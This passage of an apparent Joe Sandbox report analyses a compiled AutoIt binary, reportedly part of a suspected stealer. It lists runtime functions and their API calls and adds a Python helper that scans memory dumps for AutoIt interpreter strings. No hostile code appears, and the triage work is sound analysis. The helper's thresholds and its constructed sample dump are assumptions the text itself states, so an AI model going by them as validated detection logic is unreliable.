                                                                                                                                                                                                                                          • _wcslen.LIBCMT ref: 0016836E
                                                                                                                                                                                                                                          • _wcslen.LIBCMT ref: 00168391
                                                                                                                                                                                                                                          • _wcslen.LIBCMT ref: 001683B4
                                                                                                                                                                                                                                          • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 001683F2
                                                                                                                                                                                                                                          • LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,00165BF2), ref: 0016844E
                                                                                                                                                                                                                                          • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00168487
                                                                                                                                                                                                                                          • LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 001684CA
                                                                                                                                                                                                                                          • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00168501
                                                                                                                                                                                                                                          • FreeLibrary.KERNEL32(?), ref: 0016850D
                                                                                                                                                                                                                                          • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0016851D
                                                                                                                                                                                                                                          • DestroyIcon.USER32(?,?,?,?,?,00165BF2), ref: 0016852C
                                                                                                                                                                                                                                          • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 00168549
                                                                                                                                                                                                                                          • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 00168555
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Load$Image_wcslen$IconLibraryMessageSend$DestroyExtractFree
                                                                                                                                                                                                                                          • String ID: .dll$.exe$.icl
                                                                                                                                                                                                                                          • API String ID: 799131459-1154884017
                                                                                                                                                                                                                                          • Opcode ID: acdcd1b9b8905ee98649441b514f9c78ac97aa3f9531373d9d7bc2c0a974aead
                                                                                                                                                                                                                                          • Instruction ID: 846df9f5689748d8f5dbdac9530168bec312d714bf374affcc798893650ddd01
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: acdcd1b9b8905ee98649441b514f9c78ac97aa3f9531373d9d7bc2c0a974aead
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0261CF71640219BAEB14DF64CC81BFF77A8BF08711F10460AF956D61D1DFB4AAA0DBA0
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
Similarity
• API ID:
• String ID: "$#OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$'$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
• API String ID: 0-1645009161
• Opcode ID: cfa31b67087eb30304cf0ebd1d5262670aa81f7ff229121923df158bb95d6e9b
• Instruction ID: 54797378bd51968d1c3d56727744ebc7bcfd5c8e73b298ea1b4b9046aee6a528
• Opcode Fuzzy Hash: cfa31b67087eb30304cf0ebd1d5262670aa81f7ff229121923df158bb95d6e9b
• Instruction Fuzzy Hash: DB81F171644305BBDB25AF60DC42FFE37A9AF55300F004426F909AA293FBB0DA51D7A1
Uniqueness
• Uniqueness Score: -1.00%

APIs
• CharLowerBuffW.USER32(?,?), ref: 00143EF8
• _wcslen.LIBCMT ref: 00143F03
• _wcslen.LIBCMT ref: 00143F5A
• _wcslen.LIBCMT ref: 00143F98
• GetDriveTypeW.KERNEL32(?), ref: 00143FD6
• mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0014401E
• mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00144059
• mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00144087
Strings
Memory Dump Source
• Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
• Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
Similarity
• API ID: SendString_wcslen$BuffCharDriveLowerType
• String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
• API String ID: 1839972693-4113822522
• Opcode ID: be860a3d6856080776301413e239c4158987096353b439251698540dcbd99d79
• Instruction ID: c8f588907ba5d1f86ad13777cb591e816348bcd6f0e5ef86f08bdec05655b8e3
• Opcode Fuzzy Hash: be860a3d6856080776301413e239c4158987096353b439251698540dcbd99d79
• Instruction Fuzzy Hash: 0B71C4716043019FC710DF24C8819AAB7F4EF94754F50492DF9A697262EB31DD49CBA2
Uniqueness
• Uniqueness Score: -1.00%

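The two functions above are not stealer logic but the AutoIt3 runtime itself: the first carries the interpreter's preprocessor directive table and its parser error messages, the second is the CDTray() implementation that drives the drive door through mciSendStringW. Together they corroborate the "Binary is likely a compiled AutoIt script file" signature for process 4. The following triage helper is an added example, not part of the Joe Sandbox report or of AutoIt: it searches a memory dump for exactly those string sets (taken from the String ID fields above, in UTF-16LE because only W-suffixed APIs appear) and returns a verdict. The scoring thresholds and the constructed sample dump are this example's own assumptions.

```python
"""Corroborate a 'compiled AutoIt script' verdict from the interpreter's own strings.

Added example, not part of the Joe Sandbox report. String sets come from the
report's String ID fields; thresholds and the sample dump are assumptions.
"""
from __future__ import annotations

from dataclasses import dataclass, field

# AutoIt preprocessor directives and directive-parser errors (directive-parsing function).
AUTOIT_DIRECTIVES = (
    "#OnAutoItStartRegister", "#ce", "#comments-end", "#comments-start", "#cs",
    "#include", "#include-once", "#notrayicon", "#pragma compile", "#requireadmin",
    "Bad directive syntax error", "Cannot parse #include", "Unterminated group of comments",
)

# MCI command fragments passed to mciSendStringW by the CDTray() implementation.
AUTOIT_CDTRAY_MCI = (
    "type cdaudio alias cd wait", "set cd door", "close cd wait",
)


@dataclass
class AutoItEvidence:
    directives: list[str] = field(default_factory=list)
    cdtray: list[str] = field(default_factory=list)

    @property
    def verdict(self) -> str:
        # Assumed thresholds: a handful of directives could be quoted by unrelated
        # software, but the directive table together with the CDTray MCI strings
        # is specific to the AutoIt3 runtime.
        if len(self.directives) >= 4 and self.cdtray:
            return "compiled-autoit"
        if self.directives or self.cdtray:
            return "weak-autoit-indicator"
        return "no-autoit-evidence"


def _encodings(s: str) -> tuple[bytes, bytes]:
    # AutoIt3 is a Unicode build (the report lists only *W APIs), so strings sit in
    # memory as UTF-16LE; ASCII is checked too in case a dump was re-encoded.
    return s.encode("utf-16-le"), s.encode("ascii")


def scan_autoit_strings(blob: bytes) -> AutoItEvidence:
    """Substring search; shorter entries such as '#include' also match '#include-once'."""
    ev = AutoItEvidence()
    for s in AUTOIT_DIRECTIVES:
        if any(enc in blob for enc in _encodings(s)):
            ev.directives.append(s)
    for s in AUTOIT_CDTRAY_MCI:
        if any(enc in blob for enc in _encodings(s)):
            ev.cdtray.append(s)
    return ev


def build_sample_dump() -> bytes:
    """Constructed sample: a fake memory slice carrying a subset of the strings."""
    parts = [b"\x90" * 64]
    for s in ("#include-once", "#requireadmin", "#notrayicon", "#pragma compile",
              "Unterminated group of comments", "open  type cdaudio alias cd wait",
              "set cd door open wait", "close cd wait"):
        parts.append(s.encode("utf-16-le") + b"\x00\x00")
        parts.append(b"\xcc" * 16)
    return b"".join(parts)


if __name__ == "__main__":
    evidence = scan_autoit_strings(build_sample_dump())
    print(evidence.verdict, evidence.directives, evidence.cdtray)
```

Run it against the dumped region at 0xD0000 (or any other process dump) to separate the interpreter's fixed strings from the embedded script's behaviour before spending analysis time on functions that every AutoIt-compiled binary contains.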
APIs
• LoadIconW.USER32(00000063), ref: 00135A2E
• SendMessageW.USER32(?,00000080,00000000,00000000), ref: 00135A40
• SetWindowTextW.USER32(?,?), ref: 00135A57
• GetDlgItem.USER32(?,000003EA), ref: 00135A6C
• SetWindowTextW.USER32(00000000,?), ref: 00135A72
• GetDlgItem.USER32(?,000003E9), ref: 00135A82
• SetWindowTextW.USER32(00000000,?), ref: 00135A88
• SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 00135AA9
• SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 00135AC3
• GetWindowRect.USER32(?,?), ref: 00135ACC
• _wcslen.LIBCMT ref: 00135B33
• SetWindowTextW.USER32(?,?), ref: 00135B6F
• GetDesktopWindow.USER32 ref: 00135B75
• GetWindowRect.USER32(00000000), ref: 00135B7C
• MoveWindow.USER32(?,?,00000080,00000000,?,00000000), ref: 00135BD3
• GetClientRect.USER32(?,?), ref: 00135BE0
• PostMessageW.USER32(?,00000005,00000000,?), ref: 00135C05
• SetTimer.USER32(?,0000040A,00000000,00000000), ref: 00135C2F
Memory Dump Source
• Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
• Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
Similarity
• API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer_wcslen
• String ID:
• API String ID: 895679908-0
• Opcode ID: 95c6369e1c6ac2ec4e14bf7f1344c8cf2c31002f7202a2eb3cf3bce2ccb5303a
• Instruction ID: 76abe96af2bd96ad260c8ff8cb4645e1a6bff2df9386bc027a371c944cd00dc8
• Opcode Fuzzy Hash: 95c6369e1c6ac2ec4e14bf7f1344c8cf2c31002f7202a2eb3cf3bce2ccb5303a
• Instruction Fuzzy Hash: 5B715031900B05AFDB20DFA8CE45BAEBBF6FF48B05F104518E582A35A4D775E944CB50
Uniqueness
• Uniqueness Score: -1.00%

APIs
• LoadCursorW.USER32(00000000,00007F89), ref: 0014FE27
• LoadCursorW.USER32(00000000,00007F8A), ref: 0014FE32
• LoadCursorW.USER32(00000000,00007F00), ref: 0014FE3D
• LoadCursorW.USER32(00000000,00007F03), ref: 0014FE48
• LoadCursorW.USER32(00000000,00007F8B), ref: 0014FE53
• LoadCursorW.USER32(00000000,00007F01), ref: 0014FE5E
• LoadCursorW.USER32(00000000,00007F81), ref: 0014FE69
• LoadCursorW.USER32(00000000,00007F88), ref: 0014FE74
• LoadCursorW.USER32(00000000,00007F80), ref: 0014FE7F
• LoadCursorW.USER32(00000000,00007F86), ref: 0014FE8A
• LoadCursorW.USER32(00000000,00007F83), ref: 0014FE95
• LoadCursorW.USER32(00000000,00007F85), ref: 0014FEA0
• LoadCursorW.USER32(00000000,00007F82), ref: 0014FEAB
• LoadCursorW.USER32(00000000,00007F84), ref: 0014FEB6
• LoadCursorW.USER32(00000000,00007F04), ref: 0014FEC1
• LoadCursorW.USER32(00000000,00007F02), ref: 0014FECC
• GetCursorInfo.USER32(?), ref: 0014FEDC
• GetLastError.KERNEL32 ref: 0014FF1E
Memory Dump Source
• Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
• Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
Similarity
• API ID: Cursor$Load$ErrorInfoLast
• String ID:
• API String ID: 3215588206-0
• Opcode ID: 3a33cb9c919443364cb1c184fdfbb5b99b959172a18bb86a293e6d13f2dded23
• Instruction ID: 27d3fdccd09d4372d182bf238fc738e0e047ee0dbe83617cfa3490a8e8328059
• Opcode Fuzzy Hash: 3a33cb9c919443364cb1c184fdfbb5b99b959172a18bb86a293e6d13f2dded23
• Instruction Fuzzy Hash: C54131B1D043196BDB109FBA8C8986EBFE8FF04754B50452AE11DE7291DB78A901CE91
Uniqueness
• Uniqueness Score: -1.00%

APIs
• __scrt_initialize_thread_safe_statics_platform_specific.LIBCMT ref: 000F00C6
  • Part of subcall function 000F00ED: InitializeCriticalSectionAndSpinCount.KERNEL32(001A070C,00000FA0,EA715799,?,?,?,?,001123B3,000000FF), ref: 000F011C
  • Part of subcall function 000F00ED: GetModuleHandleW.KERNEL32(api-ms-win-core-synch-l1-2-0.dll,?,?,?,?,001123B3,000000FF), ref: 000F0127
  • Part of subcall function 000F00ED: GetModuleHandleW.KERNEL32(kernel32.dll,?,?,?,?,001123B3,000000FF), ref: 000F0138
  • Part of subcall function 000F00ED: GetProcAddress.KERNEL32(00000000,InitializeConditionVariable), ref: 000F014E
  • Part of subcall function 000F00ED: GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 000F015C
  • Part of subcall function 000F00ED: GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 000F016A
                                                                                                                                                                                                                                            • Part of subcall function 000F00ED: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 000F0195
                                                                                                                                                                                                                                            • Part of subcall function 000F00ED: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 000F01A0
                                                                                                                                                                                                                                          • ___scrt_fastfail.LIBCMT ref: 000F00E7
                                                                                                                                                                                                                                            • Part of subcall function 000F00A3: __onexit.LIBCMT ref: 000F00A9
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          • kernel32.dll, xrefs: 000F0133
                                                                                                                                                                                                                                          • InitializeConditionVariable, xrefs: 000F0148
                                                                                                                                                                                                                                          • WakeAllConditionVariable, xrefs: 000F0162
                                                                                                                                                                                                                                          • SleepConditionVariableCS, xrefs: 000F0154
                                                                                                                                                                                                                                          • api-ms-win-core-synch-l1-2-0.dll, xrefs: 000F0122
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: AddressProc$HandleModule__crt_fast_encode_pointer$CountCriticalInitializeSectionSpin___scrt_fastfail__onexit__scrt_initialize_thread_safe_statics_platform_specific
                                                                                                                                                                                                                                          • String ID: InitializeConditionVariable$SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
                                                                                                                                                                                                                                          • API String ID: 66158676-1714406822
                                                                                                                                                                                                                                          • Opcode ID: ab68e0900638e3fe014baa686767730a71266f719150ab7b7bb1d01555e1b14e
                                                                                                                                                                                                                                          • Instruction ID: 6bc20ad92b4dd8fc8129ed2e71b99cc09b85c07873eaaa097d98c33db0eb5bbe
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ab68e0900638e3fe014baa686767730a71266f719150ab7b7bb1d01555e1b14e
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8521F932645755ABE7116BE4AC05B7A33D4FB4AB51F00013AFA41A3E93DFB4A8409A90
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: _wcslen
                                                                                                                                                                                                                                          • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                                                                                                                                                                                                                          • API String ID: 176396367-1603158881
                                                                                                                                                                                                                                          • Opcode ID: 318c96c17776500e49d0b348e6fd8b7a5390f241011e4a9afa7dfade1704986d
                                                                                                                                                                                                                                          • Instruction ID: a4a3e580103606841659b2d6513a6ed467959fa3b861cb6906602a1a4ea783a2
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 318c96c17776500e49d0b348e6fd8b7a5390f241011e4a9afa7dfade1704986d
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8AE10532B00616ABCF189FB8C4416FEFBB1BF04710F15811AE466F7241DB30AE8997A4
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • CharLowerBuffW.USER32(00000000,00000000,0016CC08), ref: 00144527
                                                                                                                                                                                                                                          • _wcslen.LIBCMT ref: 0014453B
                                                                                                                                                                                                                                          • _wcslen.LIBCMT ref: 00144599
                                                                                                                                                                                                                                          • _wcslen.LIBCMT ref: 001445F4
                                                                                                                                                                                                                                          • _wcslen.LIBCMT ref: 0014463F
                                                                                                                                                                                                                                          • _wcslen.LIBCMT ref: 001446A7
                                                                                                                                                                                                                                            • Part of subcall function 000EF9F2: _wcslen.LIBCMT ref: 000EF9FD
                                                                                                                                                                                                                                          • GetDriveTypeW.KERNEL32(?,00196BF0,00000061), ref: 00144743
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: _wcslen$BuffCharDriveLowerType
                                                                                                                                                                                                                                          • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                                                                                                                                                                                                                          • API String ID: 2055661098-1000479233
                                                                                                                                                                                                                                          • Opcode ID: 042339827c8c87629548cb765227da83a251ec358220e49b32685203b91ea25c
                                                                                                                                                                                                                                          • Instruction ID: 1abec1fdcaac89d930b22ab7dd71cd9579ed65e9ed020b5206f8123e4315ac29
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 042339827c8c87629548cb765227da83a251ec358220e49b32685203b91ea25c
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6CB1E0716083029FC714DF28C890ABAB7E5BFA6760F51491DF496D72A2E730D845CBA2
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • _wcslen.LIBCMT ref: 0015B198
                                                                                                                                                                                                                                          • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0015B1B0
                                                                                                                                                                                                                                          • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0015B1D4
                                                                                                                                                                                                                                          • _wcslen.LIBCMT ref: 0015B200
                                                                                                                                                                                                                                          • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0015B214
                                                                                                                                                                                                                                          • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0015B236
                                                                                                                                                                                                                                          • _wcslen.LIBCMT ref: 0015B332
                                                                                                                                                                                                                                            • Part of subcall function 001405A7: GetStdHandle.KERNEL32(000000F6), ref: 001405C6
                                                                                                                                                                                                                                          • _wcslen.LIBCMT ref: 0015B34B
                                                                                                                                                                                                                                          • _wcslen.LIBCMT ref: 0015B366
                                                                                                                                                                                                                                          • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 0015B3B6
                                                                                                                                                                                                                                          • GetLastError.KERNEL32(00000000), ref: 0015B407
                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(?), ref: 0015B439
                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 0015B44A
                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 0015B45C
                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 0015B46E
                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(?), ref: 0015B4E3
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Handle$Close_wcslen$Directory$CurrentSystem$CreateErrorLastProcess
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 2178637699-0
                                                                                                                                                                                                                                          • Opcode ID: ec2df6c2b567a10d43f79f04d12291e59a56f7b72cb5b05d1e88974a5b369b11
                                                                                                                                                                                                                                          • Instruction ID: afd2f5ef5f63c8e0d3abe488d344a10166fb4005f41fd028dcff52d5059b9344
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ec2df6c2b567a10d43f79f04d12291e59a56f7b72cb5b05d1e88974a5b369b11
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 02F16B31608340DFC724EF24C891B6ABBE5AF85315F14855EF8999F2A2DB71EC44CB62
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

APIs
• GetMenuItemCount.USER32(001A1990), ref: 00112F8D
• GetMenuItemCount.USER32(001A1990), ref: 0011303D
• GetCursorPos.USER32(?), ref: 00113081
• SetForegroundWindow.USER32(00000000), ref: 0011308A
• TrackPopupMenuEx.USER32(001A1990,00000000,?,00000000,00000000,00000000), ref: 0011309D
• PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 001130A9
Strings
Memory Dump Source
• Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
• Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
Similarity
• API ID: Menu$CountItem$CursorForegroundMessagePopupPostTrackWindow
• String ID: 0
• API String ID: 36266755-4108050209
• Opcode ID: 5bb44b71b59fb915be3376d20a7266b1d097a6325d4f1ad03cce5b8fe0ec6419
• Instruction ID: 04cb9125223c77362575b196480c804ccfd1b6c16e89586668d136b85ecb9b06
• Opcode Fuzzy Hash: 5bb44b71b59fb915be3376d20a7266b1d097a6325d4f1ad03cce5b8fe0ec6419
• Instruction Fuzzy Hash: 3E711931644206BEEB359F24CC49FEEBF64FF05324F204216F5256A2E0C7B1A9A0DB91
Uniqueness

Uniqueness Score: -1.00%

APIs
• DestroyWindow.USER32(00000000,?), ref: 00166DEB
  • Part of subcall function 000D6B57: _wcslen.LIBCMT ref: 000D6B6A
• CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 00166E5F
• SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 00166E81
• SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00166E94
• DestroyWindow.USER32(?), ref: 00166EB5
• CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,000D0000,00000000), ref: 00166EE4
• SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00166EFD
• GetDesktopWindow.USER32 ref: 00166F16
• GetWindowRect.USER32(00000000), ref: 00166F1D
• SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00166F35
• SendMessageW.USER32(00000000,00000421,?,00000000), ref: 00166F4D
  • Part of subcall function 000E9944: GetWindowLongW.USER32(?,000000EB), ref: 000E9952
Strings
Memory Dump Source
